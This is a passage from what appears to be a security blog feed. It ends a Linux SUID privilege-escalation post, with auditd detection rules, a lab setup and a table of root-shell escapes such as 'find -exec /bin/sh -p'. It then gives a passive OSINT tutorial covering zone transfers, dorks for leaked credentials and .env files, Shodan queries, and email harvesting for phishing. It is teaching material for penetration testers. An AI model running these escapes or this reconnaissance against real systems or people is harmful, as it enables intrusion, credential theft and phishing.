style="color:#D19A66"> -Va</span><span style="color:#7F848E;font-style:italic"> # RHEL/CentOS</span></span></code></pre> <h3 id="recommended-monitoring-rules-auditd">Recommended Monitoring Rules (auditd)</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># /etc/audit/rules.d/suid.rules</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Monitor SUID binary execution</span></span> <span class="line"><span style="color:#61AFEF">-a</span><span style="color:#98C379"> always,exit</span><span style="color:#D19A66"> -F</span><span style="color:#98C379"> arch=b64</span><span style="color:#D19A66"> -S</span><span style="color:#98C379"> execve</span><span style="color:#D19A66"> -F</span><span style="color:#98C379"> euid=</span><span style="color:#D19A66">0</span><span style="color:#D19A66"> -F</span><span style="color:#98C379"> auid</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">;</span><span style="color:#98C379">=1000</span><span style="color:#D19A66"> -k</span><span style="color:#98C379"> suid_exec</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Monitor chmod/chown changing the SUID bit</span></span> <span class="line"><span style="color:#61AFEF">-a</span><span style="color:#98C379"> always,exit</span><span style="color:#D19A66"> -F</span><span style="color:#98C379"> arch=b64</span><span style="color:#D19A66"> -S</span><span style="color:#98C379"> chmod</span><span style="color:#D19A66"> -S</span><span style="color:#98C379"> fchmod</span><span style="color:#D19A66"> -S</span><span style="color:#98C379"> fchmodat</span><span style="color:#D19A66"> -F</span><span style="color:#98C379"> a1=</span><span style="color:#D19A66">04755</span><span style="color:#D19A66"> -k</span><span style="color:#98C379"> suid_create</span></span></code></pre> <hr> <h2 id="lab-setup">Lab Setup</h2> <p>To practice these techniques safely, spin up a vulnerable VM:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Vagrant — intentionally vulnerable Linux box</span></span> <span class="line"><span style="color:#61AFEF">vagrant</span><span style="color:#98C379"> init</span><span style="color:#98C379"> bento/ubuntu-22.04</span></span> <span class="line"><span style="color:#61AFEF">vagrant</span><span style="color:#98C379"> up</span></span> <span class="line"><span style="color:#61AFEF">vagrant</span><span style="color:#98C379"> ssh</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Manually configure a vulnerable binary for practice</span></span> <span class="line"><span style="color:#61AFEF">sudo</span><span style="color:#98C379"> chmod</span><span style="color:#98C379"> u+s</span><span style="color:#98C379"> /usr/bin/find</span></span> <span class="line"><span style="color:#61AFEF">find</span><span style="color:#98C379"> .</span><span style="color:#D19A66"> -exec</span><span style="color:#98C379"> /bin/sh</span><span style="color:#D19A66"> -p</span><span style="color:#56B6C2"> \;</span><span style="color:#D19A66"> -quit</span></span></code></pre> <p>Alternatively, use dedicated platforms:</p> <ul> <li><strong>HackTheBox</strong> — Privilege escalation machines on Linux</li> <li><strong>TryHackMe</strong> — “Linux PrivEsc” room</li> <li><strong>VulnHub</strong> — Kioptrix, Mr. Robot series</li> </ul> <hr> <h2 id="summary">Summary</h2> <table><thead><tr><th>Binary</th><th>Exploit Method</th><th>Difficulty</th></tr></thead><tbody><tr><td><code>find</code></td><td><code>-exec /bin/sh -p</code></td><td>Easy</td></tr><tr><td><code>python3</code></td><td><code>os.execl(&#x26;quot;/bin/sh&#x26;quot;,&#x26;quot;sh&#x26;quot;,&#x26;quot;-p&#x26;quot;)</code></td><td>Easy</td></tr><tr><td><code>vim</code></td><td><code>:!sh -p</code></td><td>Easy</td></tr><tr><td><code>bash</code></td><td><code>bash -p</code></td><td>Easy</td></tr><tr><td><code>tar</code></td><td><code>--checkpoint-action=exec</code></td><td>Medium</td></tr><tr><td><code>nmap</code></td><td><code>--interactive</code> (legacy)</td><td>Medium</td></tr><tr><td><code>awk</code></td><td><code>system(&#x26;quot;/bin/sh&#x26;quot;)</code></td><td>Easy</td></tr></tbody></table> <p>The key takeaway from all this: <strong>any</strong> SUID-enabled binary that allows arbitrary code execution or shell spawn is a path to root. Always enumerate SUID binaries as part of your Linux privilege escalation checklist.&#x3C;/unistd.h>&#x3C;/stdio.h></p>redteam@kbmsecurity.com.brprivescsuidlinuxprivescgtfobinssetuidenumerationmediumPassive Recon & OSINT — Mapping the Target Without Making Noisehttps://www.kbmsecurity.com.br/blog/post/passive-recon-osint-en/https://www.kbmsecurity.com.br/blog/post/passive-recon-osint-en/Passive reconnaissance and OSINT techniques to map infrastructure, employees, and attack surface before any active engagement.Tue, 07 Jan 2025 00:00:00 GMT<h2 id="what-is-passive-reconnaissance">What is Passive Reconnaissance?</h2> <p>Passive reconnaissance is the intelligence gathering phase where the operator <strong>never interacts directly</strong> with the target infrastructure. All information is obtained through open sources (OSINT — Open Source Intelligence) or public intermediaries.</p> <p>The critical advantage: <strong>zero logs on the target</strong>. No client IDS, WAF, or SIEM will see your activity.</p> <p>> <strong>Golden rule:</strong> the more you know before touching the network, the smaller your exposure surface during active engagement.</p> <hr> <h2 id="phase-1--domain-footprinting">Phase 1 — Domain Footprinting</h2> <h3 id="whois-and-dns-records">WHOIS and DNS Records</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Domain registration information</span></span> <span class="line"><span style="color:#61AFEF">whois</span><span style="color:#98C379"> target.com</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Fundamental DNS queries</span></span> <span class="line"><span style="color:#61AFEF">dig</span><span style="color:#98C379"> target.com</span><span style="color:#98C379"> ANY</span></span> <span class="line"><span style="color:#61AFEF">dig</span><span style="color:#98C379"> target.com</span><span style="color:#98C379"> MX</span></span> <span class="line"><span style="color:#61AFEF">dig</span><span style="color:#98C379"> target.com</span><span style="color:#98C379"> NS</span></span> <span class="line"><span style="color:#61AFEF">dig</span><span style="color:#98C379"> target.com</span><span style="color:#98C379"> TXT</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Zone transfer (often blocked, but worth trying)</span></span> <span class="line"><span style="color:#61AFEF">dig</span><span style="color:#98C379"> axfr</span><span style="color:#98C379"> @ns1.target.com</span><span style="color:#98C379"> target.com</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Subdomains via certificate transparency</span></span> <span class="line"><span style="color:#61AFEF">curl</span><span style="color:#D19A66"> -s</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">https://crt.sh/?q</span><span style="color:#98C379">=%.target.com</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">amp</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">output</span><span style="color:#ABB2BF">;</span><span style="color:#98C379">=json</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">jq</span><span style="color:#D19A66"> -r</span><span style="color:#ABB2BF"> &#x26;#x27;.[].name_value&#x26;#x27; \</span></span> <span class="line"><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">sort</span><span style="color:#D19A66"> -u</span></span></code></pre> <h3 id="amass--subdomain-enumeration">Amass — Subdomain Enumeration</h3> <p><a href="https://github.com/owasp-amass/amass">Amass</a> is the go-to tool for passive subdomain enumeration. It aggregates dozens of public sources.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Installation</span></span> <span class="line"><span style="color:#61AFEF">go</span><span style="color:#98C379"> install</span><span style="color:#D19A66"> -v</span><span style="color:#98C379"> github.com/owasp-amass/amass/v4/...@master</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Pure passive enumeration (no brute force)</span></span> <span class="line"><span style="color:#61AFEF">amass</span><span style="color:#98C379"> enum</span><span style="color:#D19A66"> -passive</span><span style="color:#D19A66"> -d</span><span style="color:#98C379"> target.com</span><span style="color:#D19A66"> -o</span><span style="color:#98C379"> amass_output.txt</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># With all data sources (requires API keys)</span></span> <span class="line"><span style="color:#61AFEF">amass</span><span style="color:#98C379"> enum</span><span style="color:#D19A66"> -passive</span><span style="color:#D19A66"> -d</span><span style="color:#98C379"> target.com</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -config</span><span style="color:#98C379"> ~/.config/amass/config.ini</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -o</span><span style="color:#98C379"> subdomains.txt</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Asset graph visualization</span></span> <span class="line"><span style="color:#61AFEF">amass</span><span style="color:#98C379"> viz</span><span style="color:#D19A66"> -d3</span><span style="color:#D19A66"> -d</span><span style="color:#98C379"> target.com</span><span style="color:#D19A66"> -o</span><span style="color:#98C379"> graph.html</span></span></code></pre> <h3 id="subfinder--fast-and-silent">Subfinder — Fast and Silent</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Installation</span></span> <span class="line"><span style="color:#61AFEF">go</span><span style="color:#98C379"> install</span><span style="color:#D19A66"> -v</span><span style="color:#98C379"> github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Passive enumeration</span></span> <span class="line"><span style="color:#61AFEF">subfinder</span><span style="color:#D19A66"> -d</span><span style="color:#98C379"> target.com</span><span style="color:#D19A66"> -all</span><span style="color:#D19A66"> -recursive</span><span style="color:#D19A66"> -o</span><span style="color:#98C379"> subfinder_out.txt</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># With automatic resolution</span></span> <span class="line"><span style="color:#61AFEF">subfinder</span><span style="color:#D19A66"> -d</span><span style="color:#98C379"> target.com</span><span style="color:#D19A66"> -all</span><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">dnsx</span><span style="color:#D19A66"> -silent</span></span></code></pre> <hr> <h2 id="phase-2--google-dorks">Phase 2 — Google Dorks</h2> <p>Google Dorks are advanced search operators that reveal sensitive information that has been accidentally indexed.</p> <h3 id="essential-dorks">Essential Dorks</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Subdomains and related hosts</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Excluding the main domain (reveals subdomains)</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#D19A66"> -www</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Exposed sensitive files</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> filetype:pdf</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> filetype:xls</span><span style="color:#98C379"> OR</span><span style="color:#98C379"> filetype:xlsx</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> filetype:sql</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> filetype:env</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> filetype:log</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Administration panels</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> inurl:admin</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> inurl:login</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> inurl:dashboard</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> intitle:</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">index</span><span style="color:#98C379"> of</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Leaked credentials and configurations</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> intext:</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">password</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> ext:conf</span><span style="color:#98C379"> OR</span><span style="color:#98C379"> ext:config</span><span style="color:#98C379"> OR</span><span style="color:#98C379"> ext:cfg</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> ext:bak</span><span style="color:#98C379"> OR</span><span style="color:#98C379"> ext:backup</span><span style="color:#98C379"> OR</span><span style="color:#98C379"> ext:old</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Exposed technology</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> intext:</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">powered</span><span style="color:#98C379"> by</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> intext:</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">phpMyAdmin</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># API endpoints</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> inurl:/api/</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> inurl:/v1/</span><span style="color:#98C379"> OR</span><span style="color:#98C379"> inurl:/v2/</span></span></code></pre> <h3 id="automating-with-gowitness">Automating with gowitness</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Screenshot of all subdomains found</span></span> <span class="line"><span style="color:#61AFEF">cat</span><span style="color:#98C379"> subdomains.txt</span><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">gowitness</span><span style="color:#98C379"> file</span><span style="color:#D19A66"> -f</span><span style="color:#98C379"> -</span><span style="color:#D19A66"> --screenshot-path</span><span style="color:#98C379"> ./screenshots/</span></span> <span class="line"><span style="color:#61AFEF">gowitness</span><span style="color:#98C379"> report</span><span style="color:#98C379"> serve</span></span></code></pre> <hr> <h2 id="phase-3--shodan--censys">Phase 3 — Shodan &#x26; Censys</h2> <p>Search engines for devices and services exposed on the internet.</p> <h3 id="shodan">Shodan</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># CLI installation</span></span> <span class="line"><span style="color:#61AFEF">pip</span><span style="color:#98C379"> install</span><span style="color:#98C379"> shodan</span></span> <span class="line"><span style="color:#61AFEF">shodan</span><span style="color:#98C379"> init</span><span style="color:#98C379"> YOUR_API_KEY</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Search by organization</span></span> <span class="line"><span style="color:#61AFEF">shodan</span><span style="color:#98C379"> search</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">org:\</span><span style="color:#ABB2BF">&#x26;quot;</span><span style="color:#61AFEF">Target</span><span style="color:#98C379"> Company</span><span style="color:#56B6C2">\&#x26;</span><span style="color:#98C379">quot</span><span style="color:#ABB2BF">;&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Filtering by ASN</span></span> <span class="line"><span style="color:#61AFEF">shodan</span><span style="color:#98C379"> search</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">asn:AS12345</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Specific exposed services</span></span> <span class="line"><span style="color:#61AFEF">shodan</span><span style="color:#98C379"> search</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">hostname:target.com</span><span style="color:#98C379"> port:22</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#61AFEF">shodan</span><span style="color:#98C379"> search</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">hostname:target.com</span><span style="color:#98C379"> http.title:</span><span style="color:#56B6C2">\&#x26;</span><span style="color:#98C379">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">Dashboard\</span><span style="color:#ABB2BF">&#x26;quot;&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Known vulnerabilities in infrastructure</span></span> <span class="line"><span style="color:#61AFEF">shodan</span><span style="color:#98C379"> search</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">org:\</span><span style="color:#ABB2BF">&#x26;quot;</span><span style="color:#61AFEF">Target\</span><span style="color:#ABB2BF">&#x26;quot; </span><span style="color:#61AFEF">vuln:CVE-2021-44228</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Download complete results</span></span> <span class="line"><span style="color:#61AFEF">shodan</span><span style="color:#98C379"> download</span><span style="color:#D19A66"> --limit</span><span style="color:#D19A66"> 1000</span><span style="color:#98C379"> results.json.gz</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">org:\</span><span style="color:#ABB2BF">&#x26;quot;</span><span style="color:#61AFEF">Target</span><span style="color:#98C379"> Company</span><span style="color:#56B6C2">\&#x26;</span><span style="color:#98C379">quot</span><span style="color:#ABB2BF">;&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#61AFEF">shodan</span><span style="color:#98C379"> parse</span><span style="color:#98C379"> results.json.gz</span><span style="color:#D19A66"> --fields</span><span style="color:#98C379"> ip_str,port,hostnames,vulns</span></span></code></pre> <h3 id="useful-shodan-queries">Useful Shodan Queries</h3> <table><thead><tr><th>Query</th><th>What it finds</th></tr></thead><tbody><tr><td><code>org:&#x26;quot;Target&#x26;quot; http.title:&#x26;quot;Jenkins&#x26;quot;</code></td><td>Exposed Jenkins servers</td></tr><tr><td><code>org:&#x26;quot;Target&#x26;quot; product:&#x26;quot;Apache Tomcat&#x26;quot;</code></td><td>Tomcat without authentication</td></tr><tr><td><code>org:&#x26;quot;Target&#x26;quot; http.favicon.hash:-1616143106</code></td><td>GitLab instances</td></tr><tr><td><code>org:&#x26;quot;Target&#x26;quot; port:3389</code></td><td>Exposed RDP</td></tr><tr><td><code>org:&#x26;quot;Target&#x26;quot; ssl.cert.subject.cn:&#x26;quot;*.target.com&#x26;quot;</code></td><td>Wildcard certificates</td></tr><tr><td><code>org:&#x26;quot;Target&#x26;quot; &#x26;quot;220&#x26;quot; &#x26;quot;230 Login&#x26;quot;</code></td><td>Active anonymous FTP</td></tr></tbody></table> <h3 id="censys">Censys</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># API via Python</span></span> <span class="line"><span style="color:#61AFEF">pip</span><span style="color:#98C379"> install</span><span style="color:#98C379"> censys</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Search for hosts by certificate</span></span> <span class="line"><span style="color:#61AFEF">python3</span><span style="color:#98C379"> -</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">lt</span><span style="color:#ABB2BF">;&#x26;</span><span style="color:#61AFEF">lt</span><span style="color:#ABB2BF">;&#x26;#x27;EOF&#x26;#x27;</span></span> <span class="line"><span style="color:#61AFEF">from</span><span style="color:#98C379"> censys.search</span><span style="color:#98C379"> import</span><span style="color:#98C379"> CensysHosts</span></span> <span class="line"><span style="color:#61AFEF">h</span><span style="color:#98C379"> =</span><span style="color:#98C379"> CensysHosts</span><span style="color:#ABB2BF">()</span></span> <span class="line"><span style="color:#61AFEF">query</span><span style="color:#98C379"> =</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">parsed.names:</span><span style="color:#98C379"> target.com</span><span style="color:#98C379"> and</span><span style="color:#98C379"> services.tls.certificates.leaf_data.subject.organization:</span><span style="color:#56B6C2"> \&#x26;</span><span style="color:#98C379">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">Target\</span><span style="color:#ABB2BF">&#x26;quot;&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#C678DD">for</span><span style="color:#E06C75"> hit</span><span style="color:#C678DD"> in</span><span style="color:#98C379"> h.search</span><span style="color:#ABB2BF">(</span><span style="color:#61AFEF">query,</span><span style="color:#98C379"> pages=</span><span style="color:#D19A66">3</span><span style="color:#ABB2BF">)</span><span style="color:#98C379">:</span></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">(</span><span style="color:#98C379">hit[</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">ip</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;], hit.get(&#x26;quot;services&#x26;quot;))</span></span> <span class="line"><span style="color:#61AFEF">EOF</span></span></code></pre> <hr> <h2 id="phase-4--theharvester">Phase 4 — theHarvester</h2> <p>Collects emails, names, hosts, and IPs from public sources.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Installation</span></span> <span class="line"><span style="color:#61AFEF">git</span><span style="color:#98C379"> clone</span><span style="color:#98C379"> https://github.com/laramies/theHarvester</span></span> <span class="line"><span style="color:#56B6C2">cd</span><span style="color:#98C379"> theHarvester</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">amp</span><span style="color:#ABB2BF">;&#x26;</span><span style="color:#61AFEF">amp</span><span style="color:#ABB2BF">; </span><span style="color:#61AFEF">pip3</span><span style="color:#98C379"> install</span><span style="color:#D19A66"> -r</span><span style="color:#98C379"> requirements/base.txt</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Basic collection with multiple sources</span></span> <span class="line"><span style="color:#61AFEF">python3</span><span style="color:#98C379"> theHarvester.py</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -d</span><span style="color:#98C379"> target.com</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -b</span><span style="color:#98C379"> google,bing,linkedin,hunter,anubis,crtsh</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -l</span><span style="color:#D19A66"> 500</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -f</span><span style="color:#98C379"> report_target</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Emails only (for phishing/password spraying)</span></span> <span class="line"><span style="color:#61AFEF">python3</span><span style="color:#98C379"> theHarvester.py</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -d</span><span style="color:#98C379"> target.com</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -b</span><span style="color:#98C379"> linkedin,hunter,google</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -l</span><span style="color:#D19A66"> 200</span><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">grep</span><span style="color:#D19A66"> -E</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">^[a-zA-Z0-9._%+-]+@</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span></code></pre> <hr> <h2 id="phase-5--people-recognition">Phase 5 — People Recognition</h2> <h3 id="linkedin-osint">LinkedIn OSINT</h3> <p>Identify employees, positions, and technologies used.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Via Google Dorks</span></span> <span class="line"><span style="color:#61AFEF">site:linkedin.com/in</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">Target</span><span style="color:#98C379"> Company</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">Security</span><span style="color:#98C379"> Engineer</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#61AFEF">site:linkedin.com/in</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">Target</span><span style="color:#98C379"> Company</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">DevOps</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#61AFEF">site:linkedin.com/in</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">Target</span><span style="color:#98C379"> Company</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">Active</span><span style="color:#98C379"> Directory</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Tools</span></span> <span class="line"><span style="color:#61AFEF">pip</span><span style="color:#98C379"> install</span><span style="color:#98C379"> linkedin2username</span></span> <span class="line"><span style="color:#61AFEF">python3</span><span style="color:#98C379"> linkedin2username.py</span><span style="color:#D19A66"> -u</span><span style="color:#98C379"> YOUR_EMAIL</span><span style="color:#D19A66"> -c</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">Target</span><span style="color:#98C379"> Company</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span></code></pre> <p>Email Format Discovery</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Hunter.io CLI</span></span> <span class="line"><span style="color:#61AFEF">curl</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">https://api.hunter.io/v2/domain-search?domain</span><span style="color:#98C379">=target.com</span><span style="color:#ABB2BF">&#x26;</span><span 